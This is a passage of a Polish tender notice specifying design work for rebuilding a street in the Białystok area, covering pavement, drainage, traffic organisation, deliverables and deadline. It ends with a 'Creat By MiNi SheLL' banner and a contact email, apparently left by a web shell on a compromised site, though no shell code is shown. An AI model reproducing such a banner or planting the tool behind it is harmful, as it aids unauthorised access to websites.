Uzbrojenie:
-	kanalizacja teletechniczna,
-	kabel telefoniczny,
-	linia energetyczna napowietrzna,
-	wodociąg, 
-	kanalizacja sanitarna w jezdni ulicy,
-	kanalizacja deszczowa w jezdni ulicy

2.	DANE WYJŚCIOWE DO PROJEKTOWANIA

2.1	Wnioskowany charakter robót: przebudowa  

2.2	Parametry techniczne do projektowania:
2.2.1. Prędkość projektowa Vp   -  30 lub 40kmh
2.2.2. Kategoria drogi- ulicy                  -   L
2.2.3. Przekrój normalny - uliczny, szer. jezdni pozostawić dotychczasową, chodniki obustronne.

        
2.3	  Konstrukcja (technologia) nawierzchni 

2.3.1	Konstrukcję jezdni określić na podstawie badań  geotechnicznych, w porozumieniu z Zamawiającym. Przewidzieć rozbiórkę istniejącej jezdni i wykonanie nowej konstrukcji.  
2.3.2	Kategoria ruchu - KR3
2.3.3	Konstrukcja nawierzchni na chodnikach - kostka brukowa betonowa na podsypce piaskowej
2.3.4	Konstrukcja nawierzchni na zjazdach - kostka brukowa betonowa na podbudowie z kruszywa stabilizowanego mechanicznie
2.3.5	Krawężniki betonowe 20x30cm.
 
2.4	  Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu
Wymiana elementów istniejącej kanalizacji deszczowej. Przebudowa skrzyżowania.   
 
2.5.   Propozycje dotyczące zadrzewienia
Zinwentaryzować zbędne zakrzaczenie i drzewa do wycinki kolidujące z przebudową.  

2.6.   Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy urządzeń obcych. W przypadku wystąpienia kolizji urządzeń obcych z przebu-dową drogi, niezwłocznie powiadomić zamawiającego, który w porozumieniu z gestorami sieci podejmie decyzję w sprawie ew. opracowania dodatkowej dokumentacji.


3.    ZAKRES OPRACOWANIA

3.1. Opracować wszystkie niezbędne materiały do zgłoszenia robót budowlanych. Opracowanie wykonać na uaktualnionej mapie numerycznej w skali 1:500 dostępnej w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej  w Białymstoku, 15-213 Białystok, ul. Mickiewicza 3. 

3.2. Dodatkowo należy opracować:
-	badania geotechniczne gruntu
-	stałą organizację ruchu  


3.3.  Dokumentację należy przekazać:
 
a. Projekty wykonawcze (techniczne) z częścią kosztorysową i ST	      -  4 egz.   
b. Badania geotechniczne gruntu                                                                      -  2 egz. 
            c. Projekt stałej organizacji ruchu                                                                     -  3 egz.
d. Projekty wykonawcze z częścią kosztorysową i ST w formie elektronicznej - 1 płyta



Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale nr 6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com